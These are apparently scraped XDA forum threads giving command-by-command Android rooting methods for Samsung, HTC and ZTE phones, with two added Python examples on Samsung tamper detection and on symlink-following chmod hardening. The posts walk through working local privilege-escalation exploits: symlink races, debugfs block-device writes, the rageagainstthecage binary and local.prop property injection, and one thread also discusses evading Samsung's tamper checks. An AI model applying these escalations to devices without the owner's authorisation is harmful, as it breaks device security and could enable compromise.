[ROOT][HOWTO] WIP: Root the Verizon GSIII without flashing a ROM - Verizon Samsung Galaxy S III

UPDATE: I created a tool based on this method. Head over to the new thread.
---
WARNING: This is WIP for now. Don't run it if you aren't comfortable with the possibility of having something go wrong and having to re-Odin back to stock or worse. I was already rooted and had Busybox installed, so even though I temp-unrooted first, I don't know for certain if this will work on a stock device. If anyone wants to flash back to pure stock and give it a shot, I'd appreciate it. If it works, I'll try and make it easier to use.
NOTE: This may give you the custom unlock screen! I'm not 100% certain it was this root method that did it, though, as I had installed BusyBox and frozen several system apps with TiBu before my most recent reboot. I need someone willing to test. I don't have time to backup, flash to stock, and retry at the moment.
Background: Since some people seem to have mysterious issues after flashing the root66 image, I've been looking at existing ICS root methods which don't require flashing ROMs to see if any work on the GSIII. I think I've found one.
This is an adaptation of miloj's root method for the Asus TF300T. All credit goes to him and anyone else he mentioned in his post.
Instructions:
Install the USB drivers if you don't have them already: Verizon_Wireless_I535_GSIII_Samsung_USB_Driver_v1_4_6_0.exe
Download the attached binary package and extract them somewhere
Set up adb and make sure you can see your phone
Run the following commands in a shell. A leading $, # or debugfs: is the prompt you will see on the screen (do not type it); everything after it is what you type, and lines starting with ... are comments.
Code:
adb push debugfs /data/local/
adb push su /data/local/
adb shell
$ cd /data/local/
$ mv tmp tmp.bak
$ ln -s /dev/block/mmcblk0p14 tmp
$ exit
adb reboot
... wait for phone to reboot ...
adb shell
$ cd /data/local
$ toolbox chmod 755 /data/local/debugfs
$ /data/local/debugfs -w /data/local/tmp
debugfs: cd xbin
debugfs: rm su
debugfs: write /data/local/su su
debugfs: set_inode_field su mode 0106755
debugfs: set_inode_field su uid 0
debugfs: set_inode_field su gid 0
debugfs: quit
$ rm /data/local/tmp
$ mv /data/local/tmp.bak /data/local/tmp
$ exit
adb reboot
... wait for phone to reboot ...
adb shell
$ /system/xbin/su
# id
... You should see: uid=0(root) gid=0(root) ....
# exit
$ rm /data/local/su
$ rm /data/local/debugfs
$ exit
This is using miloj's insecure su, so you should install the superuser app and immediately use its binary update feature to install a proper binary. Otherwise, you're just asking to get malware.

I very much like this root method. Would be interested to see if anyone else is able to get this successfully done on their stock devices.

Worst case, I'll be getting a replacement phone on Wednesday due to some minor screen issues, so I'll be forced to try it then.

Let us know if it works... I have a slow connection that times out at 80% because of these huge ROM files.
Sent from my SCH-I535 using xda app-developers app

Thanks for working on this Ninja, and thanks for sharing with us. :good:
Sounds like it will be the cleanest root method yet.

$ mv /data/local/tmp.back /data/local/tmp
should be
$ mv /data/local/tmp.bak /data/local/tmp
This is CONFIRMED working on my VIRGIN SGS3 I got today. Had to fix the one typo above. No problems yet. Just don't break things by freezing too many apps. Someone script up a one-click root. If you don't, I will tonight. (In about 3 or 4 hours or so.)

FlyingPoo said:
$ mv /data/local/tmp.back /data/local/tmp
should be
$ mv /data/local/tmp.bak /data/local/tmp
The perils of copy/pasting half from the original post and half from my local shell.
FlyingPoo said:
This is CONFIRMED working on my VIRGIN SGS3 I got today. Had to fix the one typo above. No problems yet. Just don't break things by freezing too many apps. Someone script up a one-click root. If you don't, I will tonight. (In about 3 or 4 hours or so.)
I'm working on one now. It's about 2/3 done. I have to go run a couple errands before I can finish it, though.

alrighty, cool beans!

FlyingPoo, did you get the "custom unlock" boot screen after adding the su binary?

May have to try this one out! Thanks

Tool here: http://forum.xda-developers.com/showthread.php?t=1792342

Did not want to post in the tool thread and confuse people, so maybe this can be used as basic research to make this method as seamless as possible? Let us know what you prefer, Ninja.
Wanted to give some more details on the "custom unlock" boot screen. There were some new findings from Lee (aka ralekdev), who is working on unlocking the bootloader.
Ralekdev said:
In other news, I found what keeps resetting the 16 byte encrypted romtype in param.img. It's libcordon.so, which is from /system/app/SysScope.apk (it'll also be copied to /system/lib/libcordon.so). It's using quite a few checks to see if you've modified your system.
There's an adb scanner, checking to see if you've changed the ro.secure or ro.debuggable props.
The root process scanner checks running processes and returns true if any are found running as root that are not one of:
"debuggerd", "init", "installd", "servicemanager", "vold", "zygote", "netd", "ueventd", "dock_kbd_attach", "pppd", "pppd_runner", "mpdecision", "thermald", "hdmid", "sec_keyboard", "seccmmond", "mfsc", "mfdp"
There's also a partition check, kernel checker, su scanner, and a file scanning mechanism using data from a sqlite db
So to completely remove the Samsung custom screen on bootup and 5 second delay you'd need to disable the SysScope.apk, then encrypt and write the 16 bytes yourself using 0xFF000000 as the first int to mark yourself as official
If I understand correctly, there is a SysScope.apk that does the various checks detailed in that post, so I'm assuming that disabling that apk on a "virgin" system after doing this process would ensure that the custom flag never gets touched. There is also mention of a system dynamic library that does some checks, but I'm not sure of the impact of disabling that as well; maybe it makes more sense to see what other processes would be using it besides SysScope.apk.
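Added example (mine, not code from this thread, from Samsung or from libcordon.so): the root-process scan and the ro.secure/ro.debuggable check from the quoted post, re-implemented in Python over a constructed `toolbox ps` listing so the detection logic can be tried on a PC. Only the allowlist comes from the post; the exact comparisons libcordon makes and the `ps` column layout are assumptions.

```python
"""Re-implementation of two of the SysScope/libcordon checks described in
ralekdev's post, run over constructed sample data. Not the real library's
code; the allowlist is the one quoted in the thread."""

# Process names that libcordon reportedly allows to run as root, copied
# verbatim from the quoted post.
ROOT_ALLOWLIST = frozenset([
    "debuggerd", "init", "installd", "servicemanager", "vold", "zygote",
    "netd", "ueventd", "dock_kbd_attach", "pppd", "pppd_runner",
    "mpdecision", "thermald", "hdmid", "sec_keyboard", "seccmmond",
    "mfsc", "mfdp",
])

# What a stock (non-debug) build reports for the props the "adb scanner"
# looks at. These are the standard Android meanings of the two props; the
# precise test libcordon applies is an assumption.
EXPECTED_PROPS = {"ro.secure": "1", "ro.debuggable": "0"}

# Constructed sample of Android `toolbox ps` output (columns assumed to be
# USER PID PPID VSIZE RSS WCHAN PC S NAME). The su process on the last
# root line is what the scanner should notice.
SAMPLE_PS = """\
USER     PID   PPID  VSIZE  RSS     WCHAN    PC         NAME
root      1     0     304    204   c00a8b1c 0000875c S /init
root      120   1     3320   400   ffffffff 00000000 S /system/bin/vold
root      122   1     3364   388   ffffffff 00000000 S /system/bin/netd
root      125   1     896    220   c01b0e2c 0001a1e4 S zygote
app_29    2231  125   196320 21076 ffffffff 00000000 S com.android.settings
shell     2390  1     1284   476   c00ad4e4 40016b6c S /system/bin/sh
root      2410  2390  1340   520   c01b0e2c 0001a1e4 S /system/xbin/su
"""


def parse_ps(ps_output):
    """Turn `toolbox ps` text into (user, name) pairs, skipping the header
    line and anything that does not have the expected nine columns."""
    procs = []
    for line in ps_output.strip().splitlines()[1:]:
        cols = line.split()
        if len(cols) < 9:
            continue
        procs.append((cols[0], cols[-1]))
    return procs


def root_process_scan(procs):
    """Names of processes running as root that are not on the allowlist,
    i.e. what the described scanner would return true for. The NAME column
    may be a full path, so compare on the basename."""
    flagged = []
    for user, name in procs:
        base = name.rsplit("/", 1)[-1]
        if user == "root" and base not in ROOT_ALLOWLIST:
            flagged.append(base)
    return flagged


def adb_prop_scan(props):
    """The props (with their observed values) that differ from a stock
    build; empty dict means the adb scanner is satisfied."""
    return {k: props.get(k) for k, v in EXPECTED_PROPS.items()
            if props.get(k) != v}


def device_status(procs, props):
    """Collapse both scans into the status string Settings displays."""
    if root_process_scan(procs) or adb_prop_scan(props):
        return "Modified"
    return "Normal"


if __name__ == "__main__":
    stock_props = {"ro.secure": "1", "ro.debuggable": "0"}
    print("flagged:", root_process_scan(parse_ps(SAMPLE_PS)))   # ['su']
    print("status:", device_status(parse_ps(SAMPLE_PS), stock_props))  # Modified
```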

Interesting stuff. Sounds like just freezing/removing them will still give custom unlock, but it might be possible to write replacements which don't actually do the checks.
Unfortunately, I won't have a huge amount of time to spend on research for the next two weeks, but I'll see what I can do, and see what the other devs have done with reversing SysScope and libcordon.

This root method reminds me of Motorola's infamous "zergRush" root exploit. A great way to root the device without even touching the ROM.

Noxious Ninja said:
Interesting stuff. Sounds like just freezing/removing them will still give custom unlock, but it might be possible to write replacements which don't actually do the checks.
Unfortunately, I won't have a huge amount of time to spend on research for the next two weeks, but I'll see what I can do, and see what the other devs have done with reversing SysScope and libcordon.
Sounds good.
I could be wrong, but I'd imagine that since by default the flag is not set, we should be good by just disabling them. I might just be the guinea pig and immediately rename SysScope and the libcordon after rooting to see if the flag gets tripped.
Based on Lee's analysis what doesn't add up is why people who flash the full rooted "stock image" have not reported this flag being tripped yet...

lowg said:
Sounds good.
I could be wrong, but I'd imagine that since by default the flag is not set, we should be good by just disabling them. I might just be the guinea pig and immediately rename SysScope and the libcordon after rooting to see if the flag gets tripped.
Based on Lee's analysis what doesn't add up is why people who flash the full rooted "stock image" have not reported this flag being tripped yet...
It might be that if you disable them while you don't have custom unlock, it works, but if you already have custom unlock you would have to reset it somehow.
If you decide to try it, see if you can still bring up the Settings -> About device -> Status menu to see Device status, or if that crashes.

Noxious Ninja said:
It might be that if you disable them while you don't have custom unlock, it works, but if you already have custom unlock you would have to reset it somehow.
If you decide to try it, see if you can still bring up the Settings -> About device -> Status menu to see Device status, or if that crashes.
Ok, after rooting, I immediately disabled only SysScope.apk by renaming it, installed Superuser from market and updated binary, rebooted no unlock screen. Settings -> About device -> Status works fine. Device status section shows "Scanning..." for about two minutes after rebooting then simply "Modified".
After this tried soft reboot, hard reboot numerous times and still no "custom unlock" boot screen.

lowg said:
FlyingPoo, did you get the "custom unlock" boot screen after adding the su binary?
hmm. actually i do. Altho my Device status says normal.

FlyingPoo said:
hmm. actually i do.
Hmmm, maybe it does have something to do with that apk then. Originally that's all I renamed, but since then I've frozen a lot of apps and still no unlock, only showing modified status.
Sent from my SCH-I535

FlyingPoo can you post more about what you did after rooting?
Did you immediately install the ChainsDD version of su (via the binary updater in the Superuser market app) or did you stick with the version of su that came with the script for a while?
Did you ever enter "Odin/Download" mode of your device?
Just trying to figure out how our devices could have a different status if we both started from "virgin" GS3s.. Don't want to assume it's just SysScope either since I never disabled the libcordon.so and maybe it's used in other places in the system...

Related

The easiest 1.47.651.1 root+nand unlock you'll ever see without a gui (Updated)

Make sure your battery has a decent amount of charge in it, you don't want to run out of juice in the middle of this.
You will need to have the android sdk installed, as you will need to use the adb tool.
Windows users will need to install HTC Sync in order to get the usb driver for the phone installed.
Part 1: In which we find that the Evo spreads easier than a Thai whore during tourist season
Code:
adb shell "rm /data/local/rights/mid.txt"
adb shell "ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt"
adb reboot
Part 2: In which we find that engineers have no personality, but they make one hell of a bootloader
Put the files from Toast's Part 2, for nand unlock onto the sdcard (PC36IMG.zip, mtd-eng.img, recovery.img, flash_image)
then (after making sure the sdcard is remounted to the phone if you used disk mode to xfer the files):
Code:
adb shell "cat /sdcard/flash_image > /data/local/rights/flash_image"
adb shell "chmod 755 /data/local/rights/flash_image"
adb shell "/data/local/rights/flash_image misc /sdcard/mtd-eng.img"
adb reboot bootloader
When asked if you want to update, say yes. Relax for a while, the update takes some time.
When the phone eventually boots back up:
Part 3: In which I find the whore, and make her install a custom recovery
Code:
adb shell "cat /sdcard/flash_image > /data/flash_image"
adb shell "chmod 755 /data/flash_image"
adb shell "/data/flash_image recovery /sdcard/recovery.img"
After this you should be fully rooted with nand unlock.
I highly recommend going through Whitslack's Starting Over method to bring your software and radios up to date.
You're done.
Pity this only came to light a few days before people are going to be upgrading to a new OTA.
No, this will not work for anyone who updated to 2.2.
epic!!! 789
niice!
Nice Find!
At least now people can be rooted prior to the new OTA!
damn it!
___
Sweet! Wish I had that method starting out. Lol.
Sent from my PC36100 using XDA App
does this method really work??
BAttitude7689 said:
does this method really work??
Yes it does.
ok, so i have no idea how that works... care to go into it alittle bit more?
khshapiro said:
ok, so i have no idea how that works... care to go into it alittle bit more?
The init scripts chmod 777 mid.txt on boot (this means that anyone can do anything to the file basically). By removing the file and linking it to mtd1, the chmod now makes mtd1 accessible by everyone after a reboot, which means that you can go directly to toast's part2 which starts with flashing mtd-eng.img.
Incidentally it appears the droid eris guys have been using this flaw to their advantage for a while as well ;D.
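Added example (mine, not from this thread or from any HTC or Samsung init script), in Python so it runs on a PC inside a temporary directory: the boot-time chmod that follows a planted symlink, as netarchy describes for mid.txt and as the first thread's /data/local/tmp symlink relies on in the same way, beside the hardened form a boot script should use. The file names and the 0600 starting mode are constructed stand-ins; no device paths are touched.

```python
"""Why a privileged `chmod 777 <path>` on a file inside a shell-writable
directory is exploitable once the file is replaced by a symlink, and how a
boot script can refuse to follow one. Everything happens in a temp dir."""
import os
import stat
import tempfile


def unsafe_fix_perms(path, mode=0o777):
    """The vulnerable pattern from the init scripts: os.chmod follows
    symlinks, so if `path` has been swapped for a link the mode lands on
    whatever the link points at (here a stand-in for /dev/mtd/mtd1)."""
    os.chmod(path, mode)


def safe_fix_perms(path, mode, expected_uid=None):
    """Hardened form: open with O_NOFOLLOW so a symlink fails with ELOOP,
    verify through the descriptor that it is a regular file (and, if asked,
    owned by the expected uid), then change the mode via fchmod so there is
    no window to swap the path between the check and the chmod."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file, refusing")
        if expected_uid is not None and st.st_uid != expected_uid:
            raise PermissionError(f"{path}: unexpected owner {st.st_uid}")
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def mode_of(path):
    """Permission bits of the object `path` resolves to."""
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Plant a symlink where the boot script expects a plain file, run both
    variants, and report what happened to the protected target."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed stand-in for the device node the shell user must not
        # be able to open directly.
        target = os.path.join(d, "protected_device")
        with open(target, "w") as f:
            f.write("flash contents\n")
        os.chmod(target, 0o600)

        # Constructed stand-in for /data/local/rights/mid.txt after it has
        # been removed and replaced by a symlink to the target.
        link = os.path.join(d, "mid.txt")
        os.symlink(target, link)

        unsafe_fix_perms(link)          # follows the link: target becomes 0777
        unsafe_target_mode = mode_of(target)

        os.chmod(target, 0o600)         # reset before the hardened run
        refused = False
        try:
            safe_fix_perms(link, 0o777)
        except OSError:                 # ELOOP raised by O_NOFOLLOW
            refused = True
        safe_target_mode = mode_of(target)

        # The hardened version still works on the genuine file it expects.
        plain = os.path.join(d, "genuine_mid.txt")
        with open(plain, "w") as f:
            f.write("device id\n")
        os.chmod(plain, 0o600)
        safe_fix_perms(plain, 0o755, expected_uid=os.getuid())

        return {
            "unsafe_target_mode": unsafe_target_mode,   # 0o777
            "safe_refused": refused,                    # True
            "safe_target_mode": safe_target_mode,       # 0o600, untouched
            "safe_regular_mode": mode_of(plain),        # 0o755
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {oct(value) if isinstance(value, int) else value}")
```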
So no, really? What is "root?"
You do fine work, sir
posting in a legendary thread
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
netarchy said:
Part 1:
Code:
adb shell rm /data/local/rights/mid.txt
adb shell ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt
adb reboot
What would be more interesting is for someone on the new OTA non-root to see if this exists in the Froyo release. I'll look around for a posting of the OTA update non-rooted and try it on my smashed phone. At least I won't care if that thing loses root.
Could we get a "The easiest 1.47.651.1 root method with nand unlock" for dummies? I have no clue what to do with this code.
You need to use an ADB shell for this using the Android SDK....
I tried to use the Evo-Recovery shell and received permission denied errors.
I am not a DEV by any means, and do not claim any credit for any of this. However, for people who need help, this may offer some assistance -- this is definitely the easiest root method out there.
1. Download and Install Android SDK - Learn Here
http://forum.xda-developers.com/showthread.php?t=694250
2. Open up a Command Prompt by holding windows button & pressing R or by pressing Run and typing CMD.
3. Navigate your way in DOS to the Android SDK folder, then to the Tools Folder
4. Then enter in the code in part 1. After each line press enter...the line will repeat below it.
5. Follow Toast's Part 2 -- Link: http://forum.xda-developers.com/showthread.php?t=701835 -- Video found here: http://www.youtube.com/watch?v=tUXTB0eydwE.
5A. Because you didn't do Toast's Part 1 of Root first (you used an exploit provided by the OP), you will NOT have a NAND Backup. Put the Custom ROM you want to load on your SD card, and after unlocking NAND protection and doing the wipes, load it from the custom recovery in lieu of restoring your NAND backup.
6. You're now rooted w/ NAND Unlocked!
7. I would then suggest going here, and running this so you have a fully rooted, stock ROM with all your radio/wimax up to date: http://forum.xda-developers.com/showthread.php?t=715915.
Anyone know if this method will work on an unrevoked3'd Evo? I am trying to acquire full root and I was going to use SimpleRoot today but if this will work...
Thank you for this! Question about part 7. You suggest running the fully rooted stock 1.47.651.1 afterwards. Would it be a bad idea to just run the fully rooted stock Froyo 3.23.651.3 or even any other custom ROM for that matter? i.e. OMJ's EVO 2.2 custom ROM? Thanks
regulator207 said:
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
No because you need the engineering hboot to flash it since it's not signed by HTC.
Should work on 1.32 or 1.47. Nice.
Someone should test if this still works in the new 2.2 update. Good chance it does.
damn it!
justinisyoung said:
damn it!
___
Hey! That's what I was gonna say!

[ROOT] Easy Root, works with any Stock ROM (Including 2.31.651.7!)

Disclaimer: This is not one-click. However, it IS relatively short and straightforward, and does not require you to downgrade.
Credits: The 743C exploit, and ChainsDD for Superuser.
You need:
Android SDK installed and working.
The zip attached to this post.
If you're still on Cupcake (Android 1.5) you'll need su and Superuser from http://bit.ly/su2361cd
So, let's get down to business.
Unzip the attached file into your /android-sdk/tools/ directory, it'll make your life (and ours) easier.
Open up your command line, change to the SDK tools directory, and enter these commands:
Code:
adb push rageagainstthecage-arm5.bin /data/local/tmp
adb shell chmod 755 /data/local/tmp/rageagainstthecage-arm5.bin
Now execute the exploit:
Code:
adb shell
/data/local/tmp/rageagainstthecage-arm5.bin
Wait for the exploit to finish.
Code:
exit
If it doesn't exit cleanly, chances are it worked, just close your terminal or command prompt and open a new one.
Test that it worked:
Code:
adb kill-server
adb start-server
adb shell
If you see a $, it DID NOT work, execute the exploit again. (Step 3)
If you see a #, it WORKED, continue:
Code:
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
exit
adb push su /system/xbin
adb shell chmod 4755 /system/xbin/su
adb install Superuser.apk
You may need to ctrl-c once it says Success!
Next time you 'su' in adb shell, make sure to click Allow in Superuser!
You may instead install Superuser from the Market if you wish.
Clean up the exploit:
Code:
adb shell rm /data/local/tmp/rageagainstthecage-arm5.bin
If you ever do a "Factory Reset", Superuser will go away, but you DO NOT lose root. Just reinstall Superuser.
What next? The choice is yours! Remove stock apps, get some good 'ol WiFi tethering, or flash something different!
*NOTE*
The above steps DO NOT put a recovery on your phone, though it is VERY EASY.
Once you're rooted, install ROM Manager by Koushik Dutta from the Market. Open it up, click "Flash ClockworkMod Recovery".
Select your model (Hero CDMA), and hit Allow when the Superuser Prompt shows up.
*NOTE*
The above steps DO NOT install Busybox on your phone.
Simply install Busybox from Stephen (Stericson), available on the market.
Start the app and click Allow when prompted by Superuser.
How To Uninstall
Code:
adb shell
su
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
rm /system/xbin/su
rm /etc/passwd
rm /etc/group
Uninstall Superuser.apk then reboot, and you're set!
tehdarkknight said:
Disclaimer: This is not one-click. However, it IS relatively short and straightforward.
Credits: The 743C exploit, and ChainsDD for Superuser.
You need:
Android SDK installed and working.
The zip attached to this post.
So, let's get down to business.
Unzip the attached file into your /android-sdk/tools/ directory, it'll make your life (and ours) easier.
Open up your command line, change to the SDK tools directory, and enter these commands:
Code:
adb push rageagainstthecage-arm5.bin /data/local/tmp
adb shell chmod 755 /data/local/tmp/rageagainstthecage-arm5.bin
Now execute the exploit:
Code:
adb shell
/data/local/tmp/rageagainstthecage-arm5.bin
Wait for the exploit to finish.
Code:
exit
If it doesn't exit cleanly, chances are it worked, just close your terminal or command prompt and open a new one.
Test that it worked:
Code:
adb kill-server
adb start-server
adb shell
If you see a $, it DID NOT work, execute the exploit again. (Step 3)
If you see a #, it WORKED, continue:
Code:
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
exit
adb push su /system/xbin
adb shell chmod 4755 /system/xbin/su
adb install Superuser.apk
You may need to ctrl-c once it says Success!
Next time you 'su' in adb shell, make sure to click Allow in Superuser!
That's it!
I won't give directions on installing a recovery or flashing another rom, there are plenty of threads detailing how to do so.
Pretty straightforward. This will probably help a lot of newer hero owners, because amazingly, people are still buying them every day!
If I get a chance to test it out, I will.
Nice job. Should be stickied so people don't run around searching through all the old rooting threads which aren't as compatible with the newer RUU versions.
Worked nicely on a refurb Hero that Sprint sent due to the dust problem.
Thanks!
Works great for me
Why am I having trouble doing this? I was able to do it on one Hero though not after many retries, but not on another.
tehdarkknight said:
Disclaimer: This is not one-click. However, it IS relatively short and straightforward, and does not require you to downgrade.
Credits: The 743C exploit, and ChainsDD for Superuser.
Great! I can't live without WiFi tethering my iPad which is why I haven't done the 2.31.651.7 HTC OTA update at all.
So, I take it that this exploit will root the Official RUU_Hero_C_Sprint_2.31.651.7_signed_release.exe file then too? I ask because I really don't like to do 'update patches'. I prefer to flash and start fresh so I'm planning on flashing the RUU and then doing this root exploit. Yes, No???
DaWeav said:
Great! I can't live without WiFi tethering my iPad which is why I haven't done the 2.31.651.7 HTC OTA update at all.
So, I take it that this exploit will root the Official RUU_Hero_C_Sprint_2.31.651.7_signed_release.exe file then too? I ask because I really don't like to do 'update patches'. I prefer to flash and start fresh so I'm planning on flashing the RUU and then doing this root exploit. Yes, No???
I tested it with the very same RUU, it works.
tehdarkknight said:
I tested it with the very same RUU, it works.
SUPER!
Because when I saw this post, I tried to download the latest OTA patch, but my phone just responds 'Your phone is up to date. There are no updates available for your phone'. Strange, because I'm on 2.27.651.6 and the OTAcerts.ZIP is intact.
Oh well, FEAR NOT, because after I get back from the store this morning, then get the TV tuned to the split screen with football on one and the baseball playoffs on the other, and get Leo Laporte's TechGuy radio show screaming...it'll be the perfect time to flash my phone to factory fresh.
Thanks.
Works perfectly on latest and "greatest" stock ROM... excellent
DaWeav said:
SUPER!
Because when I saw this post, I tried to download the latest OTA patch, but my phone just responds 'Your phone is up to date. There are no updates available for your phone'. Strange, because I'm on 2.27.651.6 and the OTAcerts.ZIP is intact.
Same thing happened to me, that's why I tested this method with the RUU
What are the advantages to ruu'ing to. 7 and rooting again? I rooted my .5 hero and have had no problems....is there something significant that makes the extra work worth it?
Sent from my HERO200 using XDA App
tehdarkknight said:
Same thing happened to me, that's why I tested this method with the RUU
Well, I just did the RUU, then did this root, then loaded WiFi Tether, and I'm back in business with my iPad tethering.
Vandelay007 said:
What are the advantages to ruu'ing to. 7 and rooting again? I rooted my .5 hero and have had no problems....is there something significant that makes the extra work worth it?
One reason is that when I tried to download the latest OTA update today, I could not. And another reason is before I RUU'd, I had less than 50MB of available memory, but now I have 96MB available with all of my programs loaded again. So for me, it just seems more and more that Android (or HTC Sense) is like Windows boxes since it seems I have to reload the Android OS every now and then to clean things out.
Vandelay007 said:
What are the advantages to ruu'ing to. 7 and rooting again? I rooted my .5 hero and have had no problems....is there something significant that makes the extra work worth it?
Sent from my HERO200 using XDA App
Well, if you're using Sprint's official stock .5 rom, with no tweaks applied, you gain the advantage of having an up-to-date rom with the latest bugfixes from Sprint, plus I would say my root method is less invasive and more transparent than other root methods. My personal opinion is that it feels like a root method that can't be abused easily.
SuperOneClick
But I don't need storage space with firerats custom mtd partition....I have over 200mb free with over 50 apps and zero of them on m SD card
Sent from my HERO200 using XDA App
This isn't working.... I can't get past step 3... my phone just restarts, and then I can't get any further than that.
devonkosa said:
This isn't working.... I can't get past step 3... my phone just restarts, and then I can't get any further than that.
Give us some info. What's your ROM version?
aosp said:
SuperOneClick
Is SuperOneClick the same method of rooting?
chiill said:
Is SuperOneClick the same method of rooting?
Yes it is....
Ok guyz, I'm going to help yall out !!!!
Look at this and this works I just did it.... any questions pm me then I will post up on here....
http://forum.xda-developers.com/showthread.php?t=803682
This is for rooting your Hero and other Android devices, even at .7 on the Hero.... I just did this and I laughed at how quick and easy this was... Just make sure you are in charge only mode, and you unzip the downloaded file,.. then open up the SuperOneClickv1.3-ShortFuse.zip on your computer somewhere and open up the SuperOneClick program, and bam, you are done....
http://forum.xda-developers.com/atta...5&d=1286657043

[ROOT] 1.85 - New, working method - ACT NOW, MAY NOT LAST FOREVER!

Silly HTC. THIS EXPLOIT MAY NOT LAST FOREVER. ATT COULD KILL THIS. DO IT NOW.
Warning: If something goes wrong, whatever you do, do NOT install the update that this process finds. If you DO, you will be stuck on 2.20 with no chance for root (currently)
What you need:
HOX on ATT 1.85
su binary from http://dl.dropbox.com/u/don'tusemeimabadsubinary
EDIT: The su binary above has issues. Use this one instead: http://dl.dropbox.com/u/9060692/su
Make sure HTC sync is NOT RUNNING (down in system tray)
Make sure phone is set to "charge only" and usb debugging is enabled!
Put su in same directory as ADB. Get to adb command prompt and cd into that directory
NEW - pull sim card
NEW - do factory reset
NEW - when reset is complete, do not replace sim, do NOT connect to wifi. Go through setup, go to settings, enable USB debugging. When that's done:
adb shell rm /data/data/com.redbend.vdmc/lib/libvd*
adb reboot
After the device reboots:
adb shell ln -s /data/local.prop /data/data/com.redbend.vdmc/lib/libvdmscomo.so
(If you get file doesn't exist after the FIRST command don't worry - they may not be there)
Now, on the phone, go to settings and check for software update. It will tell you you need to connect to network. Now, replace the SIM OR connect to wifi. Have it check for software update again. When it's done, do NOT click "yes" or "ok" on the phone. Simply:
adb shell ls -l /data/local.prop
IF AND ONLY IF you get "file not exists" or anything like that then set your phone's date 2 days ahead and reboot the phone and start over. If you get file info, you're golden. Proceed....
adb shell "echo 'ro.kernel.qemu=1' > /data/local.prop"
Now it's time to reboot
adb reboot
After phones reboots
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
adb shell rm /data/local.prop
adb reboot
Congrats, you have root. Install supersu and busybox installer from the market (or Play store).
If you pledged a bounty in the bounty thread, note the instructions here:
Please pay bounty to make a wish foundation
http://www.wish.org/help/donate
Please choose the "Make a Wish Foundation of America" (don't select a chapter). You can use Paypal as well.
Special thanks to designgears as well for being my tester and also writing the one click. He has several hours of work in this project as well. Consider a donation to him, too - http://rootzwiki.com/store
ADDED: Please let me know if this works for you!
ADDED: If you already pushed the wrong binary it's easiest just to start over with the correct binary.
SWEEEEEEEEEEET!
You have just made a lot of people. SCC/FGFD
where do we get the su binary. I have a supersu zip to gain root after unlock
Great job guys!!!
Do terminal apps need root to run? Can I do this with terminal and avoid ADB?
I got "no updates found" and permission denied...
-rw------- system system 1196598 2012-05-25 12:36 local.prop
beaups you are the ****ing best!!!
AWESOME. Thank you so much!
Where do we get su binary?
I'm thinking maybe from a rooted phone? I have a rooted HTC Inspire.
shgadwa said:
AWESOME. Thank you so much!
Where do we get su binary?
I'm thinking maybe from a rooted phone? I have a rooted HTC Inspire.
I added the link to op
shgadwa said:
AWESOME. Thank you so much!
Where do we get su binary?
I'm thinking maybe from a rooted phone? I have a rooted HTC Inspire.
It's in the op
Sent from my HTC One X using Tapatalk 2
2nd line after adb shell i get no device found. USB debugging is enabled.
Very awesome. Hard work and dedication finally paid off. Thanks to who all that contributed to this.
Omg. Awesome. Who discovered this exploit?
My brother, give us your PayPal so we can donate. This is awesome.
Any way to put the setting up of ADB in layman's terms for some of us that aren't familiar? I am ok with the commands, I just don't know how to get ADB to a command prompt and where to place the files.
gunnyman said:
Omg. Awesome. Who discovered this exploit?
beaups and dg
I updated to op to fix a wrong instruction.
when I put in the first line it says device not found. It's weird I can boot into boot into bootloader and everything but can't do that line
gunnyman said:
Omg. Awesome. Who discovered this exploit?
Once we get a few success stories I'll be claiming bounty (charity).
OMG GOOD JOB!!!! Im already rooted but im proud of you guys!!! GOOD JOB!! Hopefully Me and a Simonsimons will be releasing S=OFF SOON! fingers crossed
SkizzMcNizz said:
when I put in the first line it says device not found.
Try again, updated instructions.

[ROOT] ZTE z990g Merit (An avail variant?)

Root for ZTE z990g aka ZTE Merit
by jcase - [email protected] - http://twitter.com/TeamAndIRC
June 16 2012 - Copyright 2012 CunningLogic
Do Not Distribute or republish without permission. (Sad that this is needed, but people/blogs like to profit off the work of others without credit)
Want to support my work? Donations are always appreciated, but never required:
Paypal: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=LZ62YFU3XCEK8
Amazon Giftcards: [email protected]
Required files:
http://dl.dropbox.com/u/8699733/chainsdd-su.zip
Unzip chainsdd-su.zip and then get a shell with adb
Code:
adb shell
Set up the dirs so shell owns them prior to logging. If shell does not own them, we cannot control them. If the logs dir already exists you may have to do a factory reset to remove it; it should not exist unless someone attempted this previously.
Code:
mkdir /data/local/logs
mkdir /data/local/logs/kernel
Open emode's logset activity. First button should be for enabling log set, enable it. Do not exit the activity, but if you do just repeat the below command.
Code:
am start -a android.intent.action.MAIN -n com.zte.emode/.logset
Confirm the log_kernel.txt file exists, if it does not wait a minute and check again.
Code:
ls -l /data/local/logs/kernel/log_kernel.txt
If it exists, delete it and immediately symlink it to /data/local.prop, logset may recreate it, if it does delete and try symlinking again.
Code:
rm /data/local/logs/kernel/log_kernel.txt
ln -s /data/local.prop /data/local/logs/kernel/log_kernel.txt
Now we want to wait for /data/local.prop to be created, it may take a minute or two. Keep checking until it exists.
Code:
ls -l /data/local.prop
Once /data/local.prop exists, go back to the logset activity and disable logset. If you don't disable it, it will slowly eat away at all the disk space, and possibly overwrite local.prop before you get root. Now let's set qemu=1, then reboot.
Code:
echo 'ro.kernel.qemu=1' > /data/local.prop
exit
adb reboot
Once you have rebooted, remount, install su.
Code:
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
Clean up your mess!
Code:
adb shell rm /data/local.prop
adb shell rm -r /data/local/logs
Reboot, install the Superuser app from the market and enjoy
Code:
